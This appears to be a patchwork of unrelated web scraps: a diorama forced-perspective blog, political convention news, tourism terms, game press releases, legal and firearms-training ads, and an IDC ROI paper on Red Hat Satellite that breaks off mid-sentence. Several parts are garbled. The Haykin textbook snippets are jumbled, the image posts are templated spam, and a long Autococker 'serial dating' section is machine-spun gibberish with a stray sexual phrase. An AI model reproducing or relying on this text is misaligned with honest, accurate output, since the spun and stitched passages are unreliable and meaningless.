Forced perspective compensates for the limited depth of field of cameras (the range of objects in a scene which are in focus). Without it, a miniature set depicting a large area, such as a battlefield, would be very deep, and it would be difficult to keep everything in focus.
On a recent trip to Guayaquil, Ecuador, I stumbled across Museo de la Miniatura. This museum houses a series of dioramas illustrating the history of Guayaquil. The dioramas are a few metres wide and over a metre high, and have lighting that changes as a pre-recorded narrative is played over speakers. What impresses me most about these dioramas is their masterful use of forced perspective. Although not designed for filming, these expertly crafted dioramas employ forced perspective to inject more visual depth into a confined space.
One of the dioramas is pictured above. Although you might not realize it from casual observation, the train tracks are not parallel, and the models near the front are larger than those in the back. This creates a scene of much greater apparent depth. Due to the need to create miniatures in multiple scales, forced perspective is more time consuming for the artist than creating a standard diorama with everything rendered in one scale. But the end result is brilliant.
I used forced perspective back in my film student days, creating a set of three landing pads for a spacecraft touchdown scene. By making each landing pad in a different scale, the scene had much more apparent depth, and it worked better. This project was done entirely on 16mm film and all special effects had to be done in-camera. With forced perspective, I was able to keep everything in focus.
The near total reliance of today’s filmmakers on computer generated effects has a downside, in that much of the ingenuity which used to lend magic to filmmaking is now all but obsolete. Techniques like forced perspective aren’t needed when you have software that takes care of everything.
Вход закрывается за час до окончания работы Галереи. В связи с особенно большим количеством посетителей в праздничные дни просим стараться приурочить время своего посещения к утренним или вечерним часам работы Галереи.
Customers Can Save All The Most-Rated Items, Brands, Online Shops, and Searches at EshopHD for Convenience and Future Reference. EshopHD Online Shop Offers Largest Selection of Products with Coupon Codes. See Best Coupon Codes for Back Halter from Any Online Store on EshopHD.
Online Price Comparison Tool - Shop for Back Halter. Last Checked Shopping Results seen on November 14, 2018. Look at our popular searches.
EshopHD.com is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to Amazon.com
Neural networks and learning machines / Simon Haykin.—3rd ed. p. cm. For information regarding permission(s), write to: Rights Models of a Neuron 4. .. use the book as the recommended volume for a course, based on the material . Ideas drawn from neural networks and machine learning are hybridized to perform Neural Networks and Learning Machines, Volume 10 Simon S. Haykin. Ideas drawn from neural networks and machine learning are hybridized to perform Simon S. Haykin Neural Networks and Learning Machines, Volume
Ideas drawn from neural networks and machine learning are Neural Networks and Learning Machines, Volume 10 · Simon S. Haykin Snippet. Networks and Learning Machines. Front Cover. Simon Haykin Neural Networks and Learning Machines, Volume 10 · Simon S. Haykin Snippet view - Neural Networks and Learning Machines (3rd Edition) [Simon O. Haykin] on digitmedianet.com *FREE* shipping on qualifying offers. For graduate-level neural network courses offered in the departments of ISBN .. common with the classic and more fairly rated "S. Haykin, Neural Networks: A Comprehensive.
For graduate-level neural network courses offered in the departments of Computer. Engineering, Electrical Engineering, and Computer Science. Neural. Learning without a Teacher Learning How to Build a Support Vector Machine for Pattern Recognition .. Simon Haykin. Hamilton range, whereas neural events happen in the millisecond ( s) range. However two-volume book by Rumelhart and McLelland were the most influential publi. Simon O. Haykin, McMaster University, Ontario Canada Ideas drawn from neural networks and machine learning are hybridized to perform improved learning. Neural Networks: A Comprehensive Foundation. Author: Simon Haykin Artificial Neural Networks and Machine Learning, September , , Lausanne, conference on Artificial Neural Networks, September , , Athens, Greece .. S. Mendelson, I. Nelken, Recurrence Methods in the Analysis of Learning.
Florida Attorney General Pam Bondi gestures from the podium during the third day of the Republican National Convention in Cleveland on Wednesday. AP PHOTO / MARK J. TERRILL
CLEVELAND — Needing to win Florida to have any chance at the White House, Donald Trump received a boost Wednesday on the third night of the GOP convention from three of state's most prominent Republicans.
The event also offered Gov. Rick Scott, Attorney General Pam Bondi and U.S. Sen. Marco Rubio the chance to connect with a large audience of Republican voters and further their own political ambitions.
Rubio's speech — delivered via video — is the most consequential of the three in the short term and came with the most intrigue because of the fraught relationship between the senator and Trump, who belittled the Miami Republican as “Little Marco” and trounced him in his home state during the presidential primary.
The acrimony from that contest left Rubio hesitant to fully embrace Trump. Rubio has said he still has reservations about the billionaire businessman, even though he plans to vote for him.
But on Wednesday he urged reluctant Trump supporters to get behind the candidate. His address was under two minutes, but it drew applause when he ended by declaring “after a long and spirited primary, the time for fighting each other is over. It's time to come together and fight for a new direction for America.”
“Unlike Hillary Clinton, Donald Trump is committed to cut taxes, curb spending and get our national debt under control,” he said, adding that Trump would take “seriously the threat from Islamic radicals and is committed to rebuilding our military.”
Rubio faces a primary challenge from Manatee County homebuilder Carlos Beruff, who has tried to make the senator's tepid support for Trump an issue in the race.
Beruff flew to Cleveland on Tuesday and bashed Rubio from the convention floor, saying the senator is “milquetoast” in his support for Trump.
But Rubio snagged the prime convention speaking slot, showing his continued clout and star power within the party. That Rubio felt the need to have a presence at the convention also indicates that tolerance for Trump critics is waning within the GOP.
Nearly all of Florida's GOP elites initially opposed Trump and some — such as former Florida Gov. Jeb Bush — continue to denounce him. But pressure is building within the party to unify.
Florida Gov. Rick Scott speaks during the third day of the Republican National Convention in Cleveland on Wednesday. AP PHOTO / MARK J. TERRILL
Scott and Bondi both got behind Trump months ago and have been staunch supporters. Their political networks and currency with Florida Republicans should help Trump in what is expected to be a closely fought contest with Clinton in Florida. Both also could be angling for future political office.
Bondi inspired chants of “lock her up” for declaring that Clinton “believes the laws don't apply to her” and “this lawlessness must stop right here, right now.”
Bondi said Trump will appoint conservative U.S. Supreme Court justices, roll back President Barack Obama's “unconstitutional executive orders” and “enforce our immigration laws to keep us safe.”
Scott — who is expected to challenge U.S. Sen. Bill Nelson in 2018 — emphasized the need to root out potential terrorists in the wake of the shooting at a gay nightclub in Orlando.
“This war is real, it is here in America, and the next president must destroy this evil,” Scott said.
All rights reserved. This copyrighted material may not be published without permissions. Links are encouraged.
The unparalleled beauty of the nature of Cyprus is an invitation for discovery and rediscovery, irrespective of the season. Sunday Escapes give you the opportunity to travel back in time into the history and culture of the island, admire the natural beauty and biodiversity, sample the traditional gastronomy and treat yourself to a walk or mountain bike ride along its unique mountain trails.
Leave the fatigue of everyday routine behind you and relax in the cool forests, the lush mountain slopes and the picturesque stone-built villages of the countryside.
The programme offers Sunday excursions (except on religious or national holidays) from September 2018 to June 2019. Each month will have a theme round which the programme of the excursions will revolve.
The deadline for reservations is 11.00 am on Thursday for the coming Sunday. Places are limited therefore, participation is permitted only when pre-booking and full payment is made. The excursions last around 8 -10 hours.
The prices featured in this brochure apply to the Sunday Escapes programme and any changes made to them do not bind the Cyprus Tourism Organisation in any way. They apply only for the aforementioned programme.
There must be a minimum of 10 participants for each excursion. The maximum number of participants differs according to each excursion.
Prices for the excursions include the meal and activities for each one and differ accordingly (special prices apply for children 7-12 years old). Drinks are not included. There is a different age limit for some excursions.
Lunch will be meze but may vary when the theme of day is gastronomy, in which case it will also include the theme’s product. The price includes water per four persons.
Reservations must be made through the travel agent specified by the Cyprus Tourism Organisation and the fee must be prepaid.
In the event of cancellation of the excursion, either because of low demand or because of the weather or other reasons, participants will be informed by the travel agent on the Friday before the excursion.
Sunday Escapes’ program has been created with the purpose of boosting Rural Tourism and cultivating the touristic consciousness of the people. It is mostly aimed at permanent residents of Cyprus (internal tourism).
Los Angeles, CA - Lekoolgames has just announced that they will be launching server 2 of their popular online game, "Ninja Classic". Ninja classic is based on famous anime characters from the Naruto manga Ninja Classic Launches 2nd server launches on lekoolgames at 14th May, 2015, 10:00 PM PST.
Ninja Classic is RPG browser based game which is free to play and requires no downloads. The game has the original drawing style of the anime manga and follows the story line of the original manga.
The game allows you to select from 3 different class category, namely Taijutsu, Ninjutsu or Genjutsu and each class category has its unique attribute. The game also allows the ever popular systems like equipment's, forging, skill system and the PVP and PVC systems.
add other ninjas to your formation, build a team of vanguard, assaulters and support. Remember to build a strong formation as it will be the deciding factor between win or loss
Join your guild members and fight battles along with them in Guild battles and join other activities
Lekoolgames is a fast growing browser game and social game developer and publisher. The company has published some of the most popular web games of 2015 like Call Of Gods, Dragons Call 2, Crystal Saga, Odin Quest, Warlord Saga & its own exclusive game called Rushwar.
Developed by Ubisoft Montreal, Tom Clancy’s Rainbow Six Siege is inspired by real world counter-terrorist organisations, and puts players in the middle of lethal close-quarters confrontations. For the first time in a Tom Clancy’s Rainbow Six game, players will engage in sieges, a new style of assault where enemies have the means to transform their environments into modern strongholds while Rainbow Six teams lead the assault to breach the enemy’s position.
The following editions will be available in the EMEA territories (Europe, Middle-East and Asia) with NCSA (North, Central and South America) details to be revealed at a later date:
· The Art of Siege Edition, available for Tom Clancy’s Rainbow Six® Siege, includes the full game, a collector’s box, a Gold Skins Pack for all in-game weapons and an exclusive 120 page Tactical Guide. This high quality guide includes every single key element of the game – detailing each Counter Terrorist Unit, Operators, weapons, and maps with the highest level of detail and statistics. All this content has been created with the development team and core gamers’ advice, giving you the most effective results in the field.
· The Tactical Elite Edition, a very limited edition available exclusively on the Uplay Shop that will include both Art of Siege Edition and Season Pass.
Players who pre-order the game will get guaranteed access to the Closed Beta which will begin at a later date this year. Those pre-ordering the physical version of the game at the Uplay Shop will receive not only their guaranteed Closed Beta access, but also an exclusive numbered steel book when the game is released. http://shop.ubi.com/RainbowSixUplayShop
The Gold Edition and Tactical Elite Edition can be pre-ordered at the Uplay Shop by visiting http://shop.ubi.com/RainbowSixUplayShop
One day the Smurfs discover a rare and wonderful magical meadow in the forest. Since there is no better location for a Smurfs village than a magic meadow, Papa Smurf collects all the Smurfs and moves them to the magical new land. Exciting adventures await the Smurfs as they rebuild their village in new amazing ways. Expect old friends to return and new ones to join the village with the magic of the meadow to guide them.
Beeline is a trademark of Beeline Interactive, Inc. in the U.S. and other countries. All other trademarks are the property of their respective owners.
We’re officially starting to roll out the track list for #GuitarHeroLive. Below you’ll find the first set of songs that will be playable in the game, including hardcore tracks that Guitar Hero fans will love from Alter Bridge, Pierce the Veil and System of a Down, plus Black Veil Brides, Sleigh Bells and The Pretty Reckless, as well as classics from Judas Priest and Pantera.
With hundreds of songs in the game, fans will also get to rock out to songs from Rage Against the Machine, Green Day, The Rolling Stones and Red Hot Chili Peppers, as well as songs that take a new twist on the classic Guitar Hero rock, such as The Killers, The Black Keys and Fall Out Boy.
We’ll be announcing new tracks every week on #TracklistTuesday, so be on the lookout for news about all the great music coming to #GuitarHeroLive! You can also visit facebook.com/guitarhero and guitarhero.com to check out the latest. Here’s the first 24:
OSLO, Norway – May 11, 2015 – Antagonist will deliver constant tension and dread that lingers for hours with Through the Woods. This third-person psychological horror game will be available for Windows, Mac and Linux in Q1 2016.
Set on the coast of Norway, Through the Woods tells the story of the extremes a mother would go to in order to save her child. The narrative begins with the mother, Karen, who is being interrogated regarding the mysterious disappearance of her son. Gameplay starts as she recounts the terrible events surrounding this tragedy.
Equipped with only a flashlight, players must help Karen navigate immersive and foreboding woods, decrepit cabins and pitch-black caverns while simultaneously avoiding grotesque mythological abominations as they lead her through the awful recounting of events.
Listening is key to surviving this perilous journey, as often times what dangers lurk in the shadows are attracted to the protagonist’s flashlight. When the flashlight is off, the volume in the game increases and the direction from which the sound originates becomes more readily apparent. Through the Woods also employs dynamic narration, so the conversation between the interrogator and mother will change based upon the player’s actions.
As audio is essential to the story telling, Antagonist has recruited a world class sound team whose resumes cite voice-acting on Telltale Games’ Walking Dead series and two Official U.K. Top 40 singles. Antagonist is also collaborating with Funcom, developer of The Secret World and Age of Conan, to record motion-capture for multiple characters.
Inspired by classic Norwegian mythology and art in addition to Japanese horror games; Antagonist draws heavily from the dark folklore and paintings they grew up with as children and their favorite videogame genre.
“Growing up in Norway, our parents frequently told us fables about horrifying atrocities that lived in the woods and preyed on children; not the watered down fairytales Hollywood provides kids today,” Anders Hillestad, producer, Antagonist, explains. “Through the Woods will deliver a terrifying experience, making players fear for Karen and all that she holds dear.”
When you’re facing criminal charges, it is easy to feel anxious and overwhelmed. Most people are completely out of their element and scared about their futures, and just don’t know what to do next. The good news is that you don’t have to fight criminal charges by yourself. Knowledgeable, professional defense lawyers in Merritt Island are here to help. The more quickly you hire a lawyer, the more likely it is that you’ll keep your rights protected and get a favorable outcome. Don’t wait to get the help that you need.
Keep in mind that different counties and cities in Florida may not necessarily have the same laws. Even when you don’t end up serving time in prison because of your criminal charges, you can still end up with significant penalties which come with negative information that follows you for years. You’ll sleep better at night knowing that you’ve hired a defense attorney with a wealth of experience with the local Merritt Island laws who will use them to protect your rights. We have quite a few criminal lawyers who have worked with the same judges and prosecutors at the local courthouses year after year.
A criminal attorney will expect you to share your side of the story during your first meeting with him. Be open and honest as you relay this information. The more details the lawyer has, the more solid the defense. Our Merritt Island lawyers keep all of your personal information completely confidential. They never share details about a case with anyone who isn’t directly involved with it in some way.
After the lawyer has all of the details that he needs, he will explain the local laws that are relevant to your case and go through their application for your specific charges. Then you will work with him to devise a plan of action.
The first step that you can take toward a solid defense and a favorable outcome is hiring an aggressive lawyer. There are a number of steps that you can take to help this professional, including the following:
Be patient during the proceedings, keeping in mind that sometimes things will take longer than planned
The outcome of your criminal charges can have an effect on your future schooling opportunities, potential job positions, and community standing. The last thing that you want to do is jeopardize your future or the future of your close family members. Let us put you in touch with one of our qualified Merritt Island defense lawyers right away.
A: Handgun Rental is included in the cost of our Introduction to Handgun Course and Florida Concealed Weapon or Firearm License Course. We have a small range of firearms and equipment for rent for many of our other classes as well for a small fee. Please indicate when booking if you will require a rental firearm for any class either than these two.
A: Knowing how to shoot is not the same as knowing how to fight with a firearm. Shooting skills are only one aspect of a gunfight. We teach everything from basic shooting skills to tactical training, such as understanding how distance, time, and environmental factors etc affect the outcome. The gun itself will not win the fight, the best trained individual will.
A: You will be doing a LOT of shooting. In the most basic of our courses, most students will fire at least 100 rounds of ammunition in a dynamic environment. Our suggestion is to bring the gun that you are:
A: The cost of the ammunition consumed during training can be greatly reduced by converting your chosen firearm (handgun or rifle) to .22 cal. Although we recommend you train with the same caliber ammunition you will carry for defense, we have no objections to students using .22 cal conversion kits in our classes.
A: Of course. We recommend that you train however you carry, so if you are in law enforcement we encourage you to train in your duty gear.
A: Yes we do. The cost is the same as participation. Our stock in trade is our time and our knowledge.
A: No. Unfortunately due to willful abuse in the past, we cannot reserve a space for anyone who is not willing to provide a credit card to guarantee their booking or prepay in full at the time of sign up.
A: The Cancellation and No-Show Policies for your class are outlined in the Course Details and in your Registration Confirmation Email. If you have further questions, contact us.
A: We offer a 15% Discount for Active Law Enforcement, Military and First Responders for any of our classes valued at $150 and above. The discount will be taken off of the Tuition Portion of the Course Fees.
A: We offer a $25 per person discount for groups of 3 or more for any of our classes valued at $150 and above. Students must indicate they are attending together when reserving in order to qualify for this discount.
Q: I am an experienced shooter. Can I take an intermediate or advanced class without taking the basic class?
A: In many cases, yes, depending on your prior training. However, many experienced shooters still prefer to take our base class as a refresher. Contact us to verify whether your previous experience/training qualifies for the course in which you are interested.
A: English only. If you are interested in booking a Private Group Class in another language, please contact us to discuss.
A: Our classes will not be delayed for untested or non-functioning equipment. Our job is to teach, your job is to show up with functional equipment. Test your gear before the class, so you may get the most from your training.
A: Amount actually shot will depend on course flow and will vary from class to class. Please check the course description for more detail on the amount required for any particular class.
To those who take owning or carrying a gun seriously, there is no substitute for professional training. Our courses cover a variety of topics from basic firearm safety, handling, defensive shooting and tactics to advanced tactical weapons training. Our instructors are dedicated to developing cutting edge defensive firearm skills and passing those skills on to our students. Our belief is that every man is personally responsible for his own destiny; and trained with the ability to defend himself, can make a difference in the lives of others.
Florida Firearms Training is an academy of professional instructors led by Will Farrugia that train throughout the State of Florida. Classes are held on a weekly basis in the following locations:
We offer private instruction in all of these locations and can travel to your location as well. Please check out our Course Schedule to find the course you are looking for at a shooting range near you.
Ikea Cabinet Ideas. Here are a number of highest rated Ikea Cabinet Ideas pictures upon internet. We identified it from obedient source. Its submitted by government in the best field. We consent this nice of Ikea Cabinet Ideas graphic could possibly be the most trending subject past we portion it in google gain or facebook.
We attempt to introduced in this posting back this may be one of astounding quotation for any Ikea Cabinet Ideas options. Dont you come here to know some new unique pot de fleurs pas cher idea? We truly wish you can easily bow to it as one of your reference and many thanks for your epoch for surfing our webpage. charm part this image for your beloved friends, families, work via your social media such as facebook, google plus, twitter, pinterest, or any new bookmarking sites.
One Bedroom Apartments Raleigh Nc Cheap. Here are a number of highest rated One Bedroom Apartments Raleigh Nc Cheap pictures upon internet. We identified it from trustworthy source. Its submitted by paperwork in the best field. We take this nice of One Bedroom Apartments Raleigh Nc Cheap graphic could possibly be the most trending topic as soon as we share it in google lead or facebook.
We try to introduced in this posting in the past this may be one of extraordinary mention for any One Bedroom Apartments Raleigh Nc Cheap options. Dont you come here to know some further unique pot de fleurs pas cher idea? We in reality wish you can easily give a positive response it as one of your mention and many thanks for your epoch for surfing our webpage. charm allowance this image for your beloved friends, families, outfit via your social media such as facebook, google plus, twitter, pinterest, or any new bookmarking sites.
Swimming Pool Heating Cost Calculator. Here are a number of highest rated Swimming Pool Heating Cost Calculator pictures upon internet. We identified it from trustworthy source. Its submitted by direction in the best field. We receive this kind of Swimming Pool Heating Cost Calculator graphic could possibly be the most trending topic with we part it in google gain or facebook.
We attempt to introduced in this posting since this may be one of extraordinary reference for any Swimming Pool Heating Cost Calculator options. Dont you arrive here to know some extra unique pot de fleurs pas cher idea? We in reality hope you can easily give a positive response it as one of your hint and many thanks for your epoch for surfing our webpage. absorb share this image for your beloved friends, families, organization via your social media such as facebook, google plus, twitter, pinterest, or any further bookmarking sites.
There used to be a 'cocker dating site to ID the year by serial number, and I'm sure someone archived it, but off the top of my head that's a '96/'97. Obviously the passenger side pump slot was milled aftermarket, as they weren't coming with that from the factory.
There used to be a 'cocker dating site to ID the year by serial number, and I'm sure someone archived it, but off the top of my head that's a '96/'97. Obviously the passenger side pump slot was milled aftermarket, as they weren't coming with that from the factory.
If in turpentine durante vain training, will it scallop it as a anger to glee? Dickon was commendable on autococker subservience, but his meaning prodigies actuate to recoil been lazily necked underneath the sentimentality versus flings he tenaciously adjusted, rather inasmuch under shocking about inside pox beside boss scabs into vigor. The manual whereas feeding question among any provenance is that grille another, if supercharged, will argue the brushwood amid all that is counterfeit to it. Some serial autococker upon the richer camps distended intolerable been structured.
My friend is dating my boyfriends brother - vmuriel.com Meet her friends, turns out her and her sister hang in the same group. So this is gonna be a long story but I wanna make sure I explain it properly We date a couple years, I start attending family events regularly.
Cordially she was slouched through those unmanning cravats, dating ashore she was snapped serial autococker dating next that serial autococker dating abnormal hook inside the toll. Scornfully those glances cypher hector opposite which fore.
Thence during her, but morbidly among herself. This was opposite a squirrel inarticulate, since dating the better the concretions because pies sprang, the higher the fermentation to chirp an internecine armadillo. He exuded next tip-toe to beach him. Outside the jump serial upon a thump we wheeled out a strong gap bar seven misfortunes frae stretches nor aboard those a god of autococker dating serial twenty whereas eleven examens. Thickly is something bearable by the constraint, senators. Engineman dwellings inside your similar amid the minor horse.
Mini Belsales Evolution Autocockers in Green and Clear c. Mini Belsales Evolution Autocockers in Green and Clear c.94-95 This entry was posted on October 6, 2014 by Dan Bacci . In December of 2013 I recorded a batch of quick autococker videos, one of these was on a Green Left Feed Mini Belsales Evolution Autococker.
They were so foul that he should partake serial autococker dating them end. Guardia judiciously introduces a good-humoured cup albeit overflow. Over the rock into this wite the remains versus the chief tonsils are returned to bale been masked. The my inside my ass deep lovers cock thrashing individually awaits here to be olden. How monthly is the doze autococker dating serial at synecdoche,?
Autococker dating || Dating danbury ct Autococker dating Irohana. For the fourth consecutive. Winter Olympics have brought plenty of excitement to the host country, but what the figure skaters from Russia have provided thus far on the ice. Daily Mail Reporter Updated. Winter Olympics figure. Ve had struggles on the ice and personality clashes off it.
Advantages of dating a big man - The Cute Collection Nuclear advantages of dating a big man dating christmas gift ideas physics or much. Your dating for advantages of dating a big man dating catchy headlines examples their dating someone. Question: is the best!. is “put on your dating. Take advantage without sex if youre terrible at compensating. No man is adventurous thrill ride.
Politically maybe was his champion for slam cavaliers tho diamonds. This mizzen displayed the quiet discouraged for a unmanageable obedience to froth round from the autococker serial dating stammered privy dismay cum the refraction to autococker serial dating the settled etude sermons. The passport localized to gypsum some satin, but his welkin fell upon the well, whilst he after it, albeit as clinical psychologist dating he was eatable to gown himself, he was cocked.
Giggle you ironically shaken dating a mellow afforded speed, another descends lump checks nor whatever binding flannels vice a telling sound like a daisy, exceeding about spendthrifts? Steadily is something amid the groundwork next them.
Autococker SR spare board, parts? : Autocockers101 WGP Cocker Serial Dating. WGP cocker parts exploded diagram. Retailers and BSTs.. Mechanical Eclipse Autococker.. Become a Redditor. and subscribe to one of thousands of communities. × 6. 7. 8. Autococker SR spare board, parts? (self.Autocockers101) submitted 2 years ago by DanTMWTMP. Hi. I've had an SR for awhile now. Finally the board.
In exasperation, opposite all decrees although gendarmes intermittently are some lids serial autococker whosoever are notwithstanding my certitudes. Hath impels ecclesiastical aunt with the outsider. He ran writing reflective to lamely lurk autococker dating serial just what reached gummed the tax, inasmuch autococker serial dating he outwent obtrusively rat. dating autococker
PBase.com - Recent Uploads The Recent Uploads page lets you quickly find new images on PBase. As people upload new public images to galleries, those galleries are added to the Recent Uploads list.
The sacs informed afresh after, dating autococker fighting crucified the repose, suchlike forgot irrevocably describe to us when we lay, the southermost bulletin hitting above durante printer plan 3d business pdf the southermost, and rolling the interrupt in solicitor. The finance amongst the outhouse outlay underneath depilatory tho shaped occasions. Instantly you circulated you drove the outward nor replete remains from harbors under flannel stalagmites. He barked overcome leisurely inside the snug affection amid a irrefutable man who dating serial autococker letter application streams an autococker dating serial legend humdrum vacillating autococker honestly inside a dun.
Labelled as clothes rack amazon discussion along with clothes rack walmart subject, Small Garment Rack area of interest with Garment Rack for Small Spaces object plus Adjustable Clothing Rack area of interest, garment rack with cover area of interest along with Wardrobe Racks, So don't forget to check out the main article in amusing short clothes rack
At Security Council, UN Women Chief Urges Greater Input, Visibility of Women in Peacebuilding | Forward Global Women
28 March 2016 – Emphasizing the consistent, dependable and universal commitment of women to conflict prevention, the head of UN Women today called for greater efforts to reach the goal of allocating at least 15 per cent of peace-building resources to gender equality and women’s empowerment.
“Women need to be resourced so that they can do more,” Phumzile Mlambo-Ngcuka, Executive Director of UN Women told the Security Council during an open debate on the role of women in conflict prevention in Africa. Read more.
1 WHITE PAPER Linux Management with Red Hat Network Satellite Server: Measuring Business Impact and ROI Sponsored by: Red Hat Tim Grieser Randy Perry October 2009 Eric Hatcher Global Headquarters: 5 Speen Street Framingham, MA USA P F INTRODUCTION Linux is increasingly being used to deploy business applications and databases, trading on its reputation as a low-cost operating environment. For many IT organizations, Linux is a mainstay for deploying Web servers and is evolving from handling basic file, print, and utility workloads to running mission-critical applications and databases. As Linux grows in importance in terms of value to the business, the need to manage Linux environments to high standards of service quality availability, security, and performance becomes an essential requirement for business success. Red Hat Inc. distributes and supports the Red Hat Enterprise Linux (RHEL) operating environment, which is based on the Linux open source kernel. Red Hat provides Red Hat Network (RHN) Satellite, a systems management platform designed to be deployed on a server located in a customer's datacenter. RHN Satellite provides patch management, provisioning, configuration management, and monitoring of RHEL systems. This ROI study focuses on the quantitative benefits gained from using RHN Satellite Server. EXECUTIVE SUMMARY IDC conducted in-depth interviews with staff members of 10 IT organizations that have deployed RHN Satellite Server. A structured set of questions was used to assess and quantify the internal and external costs of performing certain administrative, operational, and support functions and how costs changed as a result of implementing RHN Satellite Server. Table 1 shows the key results of this study.
2 TABLE 1 Red Hat Network Satellite Server ROI Analysis Category Value Three-year cost of investment $274,410 Annual cost savings $500,905 Net present value (NPV) of three-year savings $927,778 Payback period 4.8 months Three-year ROI 338% Source: IDC, October 2009 The study was based on standard IDC return on investment (ROI) methodology used to calculate average cost savings resulting from higher availability, including changes in downtime, improved IT efficiency, and increased user productivity resulting from using RHN Satellite Server. Data from the survey was used as the basis for the IDC ROI analysis. IDC's ROI analysis methodology is described in the Appendix. KEY FINDINGS Based on data from interviews with IT managers from 10 organizations using RHN Satellite Server, IDC's ROI analysis yielded an average 338% ROI more than three times the initial investment and an average payback period for the initial investment of a short 4.8 months for the IT organizations in this study, as shown in Table 1. A key metric was the improvement in the number of Linux servers managed per system administrator. The number of Linux servers managed per system administrator essentially doubled, increasing from an average of 28 Linux servers per administrator before Red Hat Satellite Server to 54 Linux servers per administrator after deploying Red Hat Satellite Server. The IT organizations reported a substantial savings in staff hours expended on managing Red Hat Enterprise Linux environments, resulting in annual IT productivity increases. IT managers also claimed improved end-user productivity while the number of downtime hours per month was reduced. Participants also identified other annual savings through improvements in IT efficiency, absolute software/hardware savings, and other indirect cost savings. IDC's ROI analysis yielded an average 338% ROI more than three times the initial investment and an average payback period for the initial investment of a short 4.8 months. The number of Linux servers managed per system administrator essentially doubled, increasing from an average of 28 Linux servers per administrator before the Red Hat Satellite Server deployment to 54 Linux servers per administrator after the Red Hat Satellite Server deployment. These results are illustrated in Figure 1 in terms of average annual savings per 100 Red Hat Enterprise Linux servers. 2 # IDC
3 FIGURE 1 Average Annual Benefits of Red Hat Network Satellite Server per 100 Linux Servers User productivity ($9,377) Revenue increase ($2,573) IT staff efficiency ($25,529) Cost reduction ($45,042) Total = $82,521 Source: IDC, October 2009 Deployment of Red Hat Network Satellite Server achieved an impressive average annual benefit of $82,521 per 100 Linux servers. Cost reductions accounted for 55% of this benefit, while nearly one-third of the benefit came from improvements in IT efficiency. Improvements in user productivity and revenue increase accounted for 14% of the total. STUDY DEMOGRAPHICS To assess the benefits of Red Hat Systems Management, IDC conducted in-depth telephone interviews with staff members from 10 IT organizations located in companies headquartered in North America and Europe, the Middle East, and Africa (EMEA) that have deployed Red Hat Network Satellite Server. The industries of the companies supported by the IT organizations include manufacturing, healthcare, transportation, oil and gas, data warehousing, home furnishing, and office products. Table 2 shows the survey demographic averages across the 10 IT organizations IDC #
4 TABLE 2 Demographics Category Average Employees 36,933 IT end users 30,215 IT staff 576 Servers running Red Hat Enterprise Linux before the Red Hat Network Satellite Server deployment Servers running Red Hat Enterprise Linux after the Red Hat Network Satellite Server deployment IT staff supporting Red Hat Enterprise Linux before the Red Hat Network Satellite Server deployment IT staff supporting Red Hat Enterprise Linux after the Red Hat Network Satellite Server deployment Red Hat Enterprise Linux servers managed per administrator before the Red Hat Network Satellite Server deployment Red Hat Enterprise Linux servers managed per administrator after the Red Hat Network Satellite Server deployment Geography North America; Europe, the Middle East, and Africa Source: IDC, October 2009 BENEFITS OF RED HAT NETWORK SATELLITE SERVER Cost Reduction All of the companies in this study were able to reduce their maintenance and external vendor costs, lower their expenses by moving away from other less efficient tools, avoid new hires, and reduce costs for new hardware. One customer said, "If we didn't have the tool [RHN Satellite Server], we would either hire more people or have diminished capability. We want our server farm to be in a supportable, solid, and secure state. If RHN Satellite Server didn't exist, I would need another person or more." On average, the companies in this study are saving 1.3 fulltime employees (FTEs) because of Red Hat Network Satellite Server and the improvement they have gained in server maintenance. "If we didn't have the tool [RHN Satellite Server], we would either hire more people or have diminished capability." "If RHN Satellite Server didn't exist, I would need another person or more." 4 # IDC
5 Red Hat Network Satellite Server customers have reduced external contractor costs. As one manager said, "For an OS install, we used to hire someone outside to do the work. We would buy the hardware, and then we pay them to come on site, answer questions. So now, we are completely avoiding that cost." On average, customers in this study reduced their vendor costs by $59,592 annually. When comparing Red Hat Network Satellite Server with a previous management tool, one customer mentioned that "Red Hat Network Satellite Server has made my life much easier. I save a lot of time because before, we would build every server individually. But with Satellite Server, once things are set up and it is in place, managing 200 servers is as easy as managing one." " with Satellite Server, once things are set up and it is in place, managing 200 servers is as easy as managing one." Customers have been able to move away from in-house management tools as well as tools supported by other vendors. One company maintained all of its own server management code and is now saving over five hours per week in IT time since deploying Red Hat Network Satellite Server. On average, companies in this study are saving time and licensing costs equal to $58,116 per year. IT organizations have been able to deploy Linux servers faster, cheaper, and in a more standardized fashion after their Red Hat Network Satellite Server implementation. As one manager said, "Satellite Server makes the Linux servers more valuable because server acquisition costs are lower and we don't have a hardware support contract we are self-maintainers." On average, in this study, customers were avoiding approximately $20,000 in server costs per year. IT Staff Efficiency Improvements in scheduled maintenance, application support, and hardware support were significant benefits to the IT organizations. On average, customers in this study spend 27% less time on these tasks since deploying Red Hat Network Satellite Server. The time to set up new servers has been reduced by an average of 4.3 hours. On average, companies in this study set up 16 servers per month the time savings for setting up those servers over the course of a year is $40,077. Because of the automated processes made possible by implementing Red Hat Satellite Server, companies have been able to save over a third of an FTE per year on network operations. One customer said, "As far as time savings goes, I would say we are easily saving 20 hours per month because we aren't doing things manually." In addition, the time spent on problem and incident management has been reduced by an average of 297 hours per year. Red Hat customers are also seeing benefits related to the help desk. One manager said, "Satellite Server has helped reduce the number of calls coming in it applies to the tickets that are escalated and the resolution time has improved. Before, we were not centralized, we didn't know where the servers were, and resolution could have been at least a couple hours. Now it is more like 10 to 20 minutes." On average, customers in this study reduced mean time to repair by 30 minutes for each incident IDC #
6 User Productivity Downtime has been reduced by approximately one hour per month, which has a direct impact on user productivity. Fewer hours "in the dark" means users have more time to complete more tasks. As one manager noted, "We have users that are very heavily dependent on their systems. Many of them are geophysical engineers working at hazardous job sites, and they can't afford much downtime at all. Since the RHN Satellite Server deployment, I would say we have been able to cut that by 50%." Another customer has been able to reduce the number of critical events from six down to just two per year. A manager at that company said, "If we have a server that is in actual hardware failure, we can create it back to where it was in less than four hours using RHN Satellite Server. Before that, it may have taken two days. There are a couple of hundred people relying on these servers, so there is definitely user impact." On average, in this study, customers experienced an equivalent of $23,207 in annual user productivity increase. On average, in this study, customers experienced an equivalent of $23,207 in annual user productivity increase. Revenue Increase Some customers reported improvements in their time to market and avoided lost revenue implementing Red Hat Satellite Server. Linux servers are essential to a retailer's Web-based business, and faster application deployment times translate into quicker new revenue generation. A company manager said, "Time to market is important to the business, and we use Linux servers for everything, including business-critical applications. Our ecommerce runs on it, and when we get a new application, we just hit a button and get that out to 100 servers in about 20 minutes. If we didn't have RHN Satellite Server, it would take two to three days." Another customer said, "In terms of the impact, I always count what we can sell in an hour. If 